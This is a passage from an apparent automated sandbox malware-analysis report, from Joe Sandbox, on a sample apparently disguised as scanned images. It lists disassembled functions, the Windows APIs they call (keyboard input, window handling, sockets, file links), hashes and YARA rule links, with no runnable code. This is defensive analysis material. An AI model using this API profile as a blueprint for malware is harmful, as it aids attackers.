                                                                                • Opcode ID: 67ad1949356179ebdf6968b0e7c9ecd9d8eadf9aca7be1818153c7f03a24aaf5
                                                                                • Instruction ID: 6377e1175b83dc12853eb0bc913200c9675138ca598bdebc0e431fe825dc3af1
                                                                                • Opcode Fuzzy Hash: 67ad1949356179ebdf6968b0e7c9ecd9d8eadf9aca7be1818153c7f03a24aaf5
                                                                                • Instruction Fuzzy Hash: 9C113A312402887EEF205F3ACC45FAB3BACEFD5B65F010125FA44E2190C275DC119714
                                                                                Function 004B2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                  • Part of subcall function 004B2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B2DC5
                                                                                  • Part of subcall function 004B2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B2DD6
                                                                                  • Part of subcall function 004B2DA7: GetCurrentThreadId.KERNEL32 ref: 004B2DDD
                                                                                  • Part of subcall function 004B2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004B2DE4
                                                                                • GetFocus.USER32 ref: 004B2F78
                                                                                  • Part of subcall function 004B2DEE: GetParent.USER32(00000000), ref: 004B2DF9
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004B2FC3
                                                                                • EnumChildWindows.USER32(?,004B303B), ref: 004B2FEB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                • String ID: %s%d
                                                                                • API String ID: 1272988791-1110647743
                                                                                • Opcode ID: e4f51d88b61ce3c93fbd669f20b36f717373a6482a58f367a081a039c17a28dd
                                                                                • Instruction ID: 89e7441748b1950336ce47d6e019df134cb00b731a5082e718c70f9d74a9cc9d
                                                                                • Opcode Fuzzy Hash: e4f51d88b61ce3c93fbd669f20b36f717373a6482a58f367a081a039c17a28dd
                                                                                • Instruction Fuzzy Hash: 1D11B7716002056BDF147F728CC5EEE376AAF94309F04407AFD099B253DE78594A8B74
                                                                                Function 004E5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004E58C1
                                                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004E58EE
                                                                                • DrawMenuBar.USER32(?), ref: 004E58FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$InfoItem$Draw
                                                                                • String ID: 0
                                                                                • API String ID: 3227129158-4108050209
                                                                                • Opcode ID: 65d3f4ffe0efb2a5e014f07114c8a734d4dce0a6e2655594a3174ab78354a6b2
                                                                                • Instruction ID: c5a0b70e32c13e64adb58e072dabd99691e898e8ae38c094a3bdf35c487bf04f
                                                                                • Opcode Fuzzy Hash: 65d3f4ffe0efb2a5e014f07114c8a734d4dce0a6e2655594a3174ab78354a6b2
                                                                                • Instruction Fuzzy Hash: 8001A171500258EFDB109F12DC84BEFBBB4FB45369F0080AAE848DA252DB348A85DF25
                                                                                Function 004AD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 004AD3BF
                                                                                • FreeLibrary.KERNEL32 ref: 004AD3E5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                • API String ID: 3013587201-2590602151
                                                                                • Opcode ID: fa8d4e6e908b8d40ed6437898732dff4e8e5a1f8ad5fff5d8df2b470047aab5c
                                                                                • Instruction ID: ec9e00b7bca41079d5936d293f135289f3c8a3bce73338aa0b13a84080458f79
                                                                                • Opcode Fuzzy Hash: fa8d4e6e908b8d40ed6437898732dff4e8e5a1f8ad5fff5d8df2b470047aab5c
                                                                                • Instruction Fuzzy Hash: 84F02722C01A2187D72142105CD4B9A7220BF32701B548197E803E5609E71CCC46C6CF
                                                                                Function 004B007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69822b61fe5a4c332058f521aefe0a95c387b74d2f0858ddb121088c5075d2bb
                                                                                • Instruction ID: db4366a3721292a3dc09a66d3fb9b9faa28493bd8611348459f99037ebfe38f2
                                                                                • Opcode Fuzzy Hash: 69822b61fe5a4c332058f521aefe0a95c387b74d2f0858ddb121088c5075d2bb
                                                                                • Instruction Fuzzy Hash: C5C15D75A00206EFDB18CFA8C898AAFB7B5FF48305F108599E905EB251D735DD42CBA4
                                                                                Function 004D342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                                                • String ID:
                                                                                • API String ID: 1998397398-0
                                                                                • Opcode ID: c2d073fe95115abe4da673a65ef5e727f44be1f66aca3f4cfd58f5dbedab2156
                                                                                • Instruction ID: 0e02a377e836e953ef9fdf55e33a8384c10d9247218eeff7547be16bfd7c82c8
                                                                                • Opcode Fuzzy Hash: c2d073fe95115abe4da673a65ef5e727f44be1f66aca3f4cfd58f5dbedab2156
                                                                                • Instruction Fuzzy Hash: B5A15A75204200AFC710DF25C495A2AB7E5FF88759F04885EF98A9B362DB38ED05CB5A
                                                                                Function 004B0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,004EFC08,?), ref: 004B05F0
                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,004EFC08,?), ref: 004B0608
                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,004ECC40,000000FF,?,00000000,00000800,00000000,?,004EFC08,?), ref: 004B062D
                                                                                • _memcmp.LIBVCRUNTIME ref: 004B064E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                • String ID:
                                                                                • API String ID: 314563124-0
                                                                                • Opcode ID: c4a1c36d0209b157820926256928213e5f392ef937c3786abd746dcde4ae2263
                                                                                • Instruction ID: fd97021d00e2fa7e763c0c8fa595ddcdb2c1be5d29e0e0358cc2e4858bf34c29
                                                                                • Opcode Fuzzy Hash: c4a1c36d0209b157820926256928213e5f392ef937c3786abd746dcde4ae2263
                                                                                • Instruction Fuzzy Hash: 0A810B71A00109EFCB04DF98C984EEFB7B9FF89316F204559E506AB250DB75AE06CB64
                                                                                Function 00491391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: 075eefe01ffac802ba4afe033aa4802d443d16629ed6776b4b546c2181a61e56
                                                                                • Instruction ID: 48452378026a5595d677acf3399e29e1fd44bd449a9ae078e2a7f34c3aedec28
                                                                                • Opcode Fuzzy Hash: 075eefe01ffac802ba4afe033aa4802d443d16629ed6776b4b546c2181a61e56
                                                                                • Instruction Fuzzy Hash: 8E415D316005026BDF257BBA8C45ABF3EA4EF45374F25467BF818D62E2E63C8841476A
                                                                                Function 004E6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(012A1190,?), ref: 004E62E2
                                                                                • ScreenToClient.USER32(?,?), ref: 004E6315
                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 004E6382
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 0559e773343f1a471a435889fbff181453fe66c344511267ac58b587fc0252fa
                                                                                • Instruction ID: 38cdf049e784638b9de53d0c30d31f4d348d09d729f78f829ddecc98f3dbce5e
                                                                                • Opcode Fuzzy Hash: 0559e773343f1a471a435889fbff181453fe66c344511267ac58b587fc0252fa
                                                                                • Instruction Fuzzy Hash: FA516B70900289AFCB20DF69D8809AF7BB6EF653A1F11816AF9149B391D734AD81CB54
                                                                                Function 004D1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 004D1AFD
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1B0B
                                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004D1B8A
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1B94
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$socket
                                                                                • String ID:
                                                                                • API String ID: 1881357543-0
                                                                                • Opcode ID: 685e2af9d22751a59b6cb1c82661e5bdabd8d2a11deadbbbfc5912a24a2ad8ee
                                                                                • Instruction ID: 412f06c7d83aed2058937d59c423a1c3d1517743b77c7552dd66c29ca2fb8e65
                                                                                • Opcode Fuzzy Hash: 685e2af9d22751a59b6cb1c82661e5bdabd8d2a11deadbbbfc5912a24a2ad8ee
                                                                                • Instruction Fuzzy Hash: 6F41B134600200AFE720AF25C886F2677E5AB44718F54845EF91A9F3D3E77AED42CB95
                                                                                Function 0048B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed258d06f50d9e07c15b1d437aeeccd1454d3325bca08c032cf8e5b517981985
                                                                                • Instruction ID: 00e38616e1adeec14fe624730151d43343bf5c7e19d56514125b9167d4ee6f65
                                                                                • Opcode Fuzzy Hash: ed258d06f50d9e07c15b1d437aeeccd1454d3325bca08c032cf8e5b517981985
                                                                                • Instruction Fuzzy Hash: 0041F871900604BFD724AF39C842B6EBBA9EB84B14F10892FF545DB292D379990187D4
                                                                                Function 004C56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004C5783
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 004C57A9
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004C57CE
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004C57FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                • Opcode ID: 4ad0386d0e445e501f0b3f0be576009c1408e5d5341982b1f7a23b52cf9e823c
                                                                                • Instruction ID: e7bd91e719ee6d852d063227f20b00194c96e6d7e36dcd510b82fd574fbfaa82
                                                                                • Opcode Fuzzy Hash: 4ad0386d0e445e501f0b3f0be576009c1408e5d5341982b1f7a23b52cf9e823c
                                                                                • Instruction Fuzzy Hash: D6415E39600610DFCB10EF15C484A1EBBE1EF88329B18849DEC4A5B362DB38FD45CB95
                                                                                Function 0048D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00476D71,00000000,00000000,004782D9,?,004782D9,?,00000001,00476D71,?,00000001,004782D9,004782D9), ref: 0048D910
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0048D999
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0048D9AB
                                                                                • __freea.LIBCMT ref: 0048D9B4
                                                                                  • Part of subcall function 00483820: RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                • String ID:
                                                                                • API String ID: 2652629310-0
                                                                                • Opcode ID: 2b7dd28b92642dae97648f86e97bcd1b6bf354a7b4fbbc464e2736eaa8b7a92d
                                                                                • Instruction ID: 12d8c6ada76d39fd9c4810e49d2a797e7f899510cc813abc5593ba42d710eb17
                                                                                • Opcode Fuzzy Hash: 2b7dd28b92642dae97648f86e97bcd1b6bf354a7b4fbbc464e2736eaa8b7a92d
                                                                                • Instruction Fuzzy Hash: 1631E0B2A0121AABDF24AF65DC81EAF7BA5EF40310F05456AFC08D6291E739CD51CB94
                                                                                Function 004E52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004E5352
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E5375
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004E5382
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004E53A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow$InvalidateMessageRectSend
                                                                                • String ID:
                                                                                • API String ID: 3340791633-0
                                                                                • Opcode ID: 8095d614f596a34306f5697a97d46140da2bd777fd1beab146560344df368a58
                                                                                • Instruction ID: 7c517c26676c22204f21b1d7a2c69bc2698b8159658f02caabddd51fa4201406
                                                                                • Opcode Fuzzy Hash: 8095d614f596a34306f5697a97d46140da2bd777fd1beab146560344df368a58
                                                                                • Instruction Fuzzy Hash: 0D310734A55A88EFEB309F16CC45BEA3761AB0539AF584103FE10963E1C3B89D41974A
                                                                                Function 004BAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 004BABF1
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 004BAC0D
                                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 004BAC74
                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 004BACC6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 0c6142be0d503b4e9424dd4d35607ad1ebae04c1dab2cea42c4bd32da8ccdb1c
                                                                                • Instruction ID: c145cdc8335687f2bfc9744f0635399d3fe2056a0b7e0f747120402f50d767ba
                                                                                • Opcode Fuzzy Hash: 0c6142be0d503b4e9424dd4d35607ad1ebae04c1dab2cea42c4bd32da8ccdb1c
                                                                                • Instruction Fuzzy Hash: 39311630A002586FEF35CB6988497FB7FB5AB85310F04421BE481562D6D37C89A187BA
                                                                                Function 004E7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 004E769A
                                                                                • GetWindowRect.USER32(?,?), ref: 004E7710
                                                                                • PtInRect.USER32(?,?,004E8B89), ref: 004E7720
                                                                                • MessageBeep.USER32(00000000), ref: 004E778C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: cbf303a2bca483ee8ebe63f1f9292eb52de71c98929a5e59502cd51f2ac37d8c
                                                                                • Instruction ID: fc9e56addd63322b1f66ec3f5ae1c07b64b5d2097b1b62875c9e025b91dacf9a
                                                                                • Opcode Fuzzy Hash: cbf303a2bca483ee8ebe63f1f9292eb52de71c98929a5e59502cd51f2ac37d8c
                                                                                • Instruction Fuzzy Hash: 0D41B034A05294DFDB11CF5AC884EAA77F0FF59325F1440AAE4149B361C338B982CF94
                                                                                Function 004E16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 004E16EB
                                                                                  • Part of subcall function 004B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B3A57
                                                                                  • Part of subcall function 004B3A3D: GetCurrentThreadId.KERNEL32 ref: 004B3A5E
                                                                                  • Part of subcall function 004B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004B25B3), ref: 004B3A65
                                                                                • GetCaretPos.USER32(?), ref: 004E16FF
                                                                                • ClientToScreen.USER32(00000000,?), ref: 004E174C
                                                                                • GetForegroundWindow.USER32 ref: 004E1752
                                                                                Memory Dump Source
